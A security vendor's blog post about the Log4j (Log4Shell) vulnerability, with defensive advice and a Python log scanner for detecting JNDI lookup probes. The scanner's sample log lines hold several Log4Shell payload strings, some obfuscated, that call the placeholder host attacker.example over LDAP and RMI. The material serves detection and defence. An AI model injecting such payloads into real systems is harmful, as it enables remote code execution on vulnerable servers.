
Log4j Vulnerability

by Calyptix, December 15, 2021

A fresh zero-day attack with the ability to jeopardize the everyday operation of companies globally is in the news this week. Security researchers recently disclosed the vulnerability CVE-2021-44228 in Apache’s log4j, a widely used Java-based logging library. To exploit it, an attacker only needs to get a specially crafted string passed to the logging functions. Specifically, the vulnerability lies in log4j’s Java Naming and Directory Interface (JNDI) lookup support, which can resolve references over LDAP.

This exploit was first publicized when Minecraft players were warned that hackers could execute malicious code on servers or clients running the Java version of the game. Patching quickly remedies the problem for the game’s users, but many other systems rely on this same logging library.

Amazon Web Services, Microsoft, Cisco, Google Cloud and IBM were among the major tech players affected by the Log4j vulnerability. Wired reported that the exploit “will continue to wreak havoc across the internet for years to come.” In a statement, US Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly described the flaw as “one of the most serious I’ve seen in my entire career, if not the most serious.”


What is a Zero-day Exploit?

Bad actors are determined to get into systems and networks. They probe persistently until they find a previously unknown and unpatched flaw that gives them access to your system. Once they find such a vulnerability, they hurry to write and deploy an exploit before the developer discovers it.

This type of attack hurts business because it causes damage before you know it is there. That is why it is called a zero-day attack: the vendor has had zero days to fix the flaw before it is exploited. Regrettably, it can take weeks, even months, to discover the attack.


What to do about Zero-day Attacks

CISA has an in-depth article that explains the origin of this exploit and offers guidance on what to do if you believe one of your systems may be affected.

In the meantime, always keep software up to date with security updates and patches to limit exposure to this and other types of cyberattack.

It is also best to limit the number of software applications you install. The more you use, the greater your risk of exposure.

You will also want to install a firewall to help maximize your system protection. Firewalls include automated tools that use whitelisting to decide which applications are allowed or denied internet access. Installing antivirus tools also helps block threats and keep your devices secure. While most of these actions are automated, users should make judicious use of outbound filtering to limit what external resources their devices can reach. This is where Calyptix’s Community Shield really shines, using the fleet of AccessEnforcer firewalls to identify and block outbound events that could compromise your network.

Here are some things that MSPs and IT managers can do to respond to this vulnerability:


  1. Review the port forwarding rules on firewalls and remove any rules that are no longer necessary, or restrict them to authorized IP addresses only. Threat actors constantly probe public-facing Internet servers for flaws like the Log4j vulnerability, so reducing the number of systems they can reach reduces the chance of being compromised.
  2. Where possible, set up restrictive outbound firewall rules to control access from internal machines to external systems. This matters because exploiting the Log4j vulnerability involves a callback from the vulnerable server to the threat actor’s server. With outbound rules in place, defenders have a chance to disrupt the attack and prevent it from succeeding.
  3. Set up geographic filtering (e.g., Geo Fence). This reduces the number of attacks and probes from countries the organization does not do business with.
  4. Review all hardware and software used within the organization to identify anything that might require updates to address the Log4j vulnerability. Several online lists track whether various products and applications are affected, including:

https://github.com/NCSC-NL/log4shell/blob/main/software/README.md

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
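As an added detection example (not part of the Calyptix post), the following Python scans web-server access-log lines for the JNDI lookup string described above, which is what the probes mentioned in step 1 leave behind in logs. It first collapses the nested-lookup obfuscation that defeats a naive `${jndi:` match, then reports the lookup scheme (LDAP, RMI, ...) for each hit. The log lines and the host attacker.example are constructed.

```python
import re
# Innermost ${...} lookup: a body with no nested "${" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and the scheme after it (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)

def _resolve_one(body):
    # Literal that one lookup body yields for the common obfuscation forms; None otherwise.
    if ":-" in body:                         # ${unknownkey:-literal} -> literal
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":    # ${lower:J} -> j
        return value.lower()
    if sep and prefix.lower() == "upper":    # ${upper:j} -> J
        return value.upper()
    return None                              # ${jndi:...} or ${price} stay as they are

def normalize(text, max_rounds=20):
    # Collapse nested lookups inside-out: "${${lower:j}ndi:...}" -> "${jndi:...}".
    for _ in range(max_rounds):
        changed = False
        def repl(m):
            nonlocal changed
            literal = _resolve_one(m.group(1))
            if literal is None:
                return m.group(0)
            changed = True
            return literal
        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text

def scan_log_lines(lines):
    # Per hit: (1-based line number, lookup scheme, whether the lookup was obfuscated).
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        match = JNDI_LOOKUP.search(normalized)
        if match:
            findings.append((number, match.group(1).lower(), normalized != line))
    return findings
# Constructed sample access-log lines, not real traffic; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [15/Dec/2021:10:01:04 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [15/Dec/2021:10:01:05 +0000] "GET /x HTTP/1.1" 404 12 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.7 - - [15/Dec/2021:10:01:06 +0000] "GET /price?q=${price} HTTP/1.1" 200 99 "-" "curl/7.68"',
]
```

Pattern matching like this only finds probes that reached a logged field and used the forms it knows, so it complements, rather than replaces, patching and the outbound filtering described in step 2.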


Calyptix Protection Against Log4j

Calyptix’s developers reviewed this vulnerability and have concluded that no systems within the AccessEnforcer line are affected. Adjacent systems such as Geo Fence, Gatekeeper, Community Shield and our backend systems are also unaffected.

To further ensure protection, we rolled out a blocklist of publicly known Log4j scanners and exploits on Friday, December 10th. Since then, our developers have continued working hard to build a threat feed specifically for this exploit as it pertains to outbound events.

Geo Fence: Not Affected
Gatekeeper: Not Affected
Community Shield: Not Affected
Web Filters: Not Affected
Web Server: Not Affected

Calyptix’s AccessEnforcer is an all-in-one solution for network security and management. Our mission is to automatically block threats like hackers, spam, and malware. Our network tools keep small business connections fast and reliable. With Community Shield™ we have added a community-driven, proactive feature to further defend users.

Check out our Community Shield™ Log4j Dashboards.
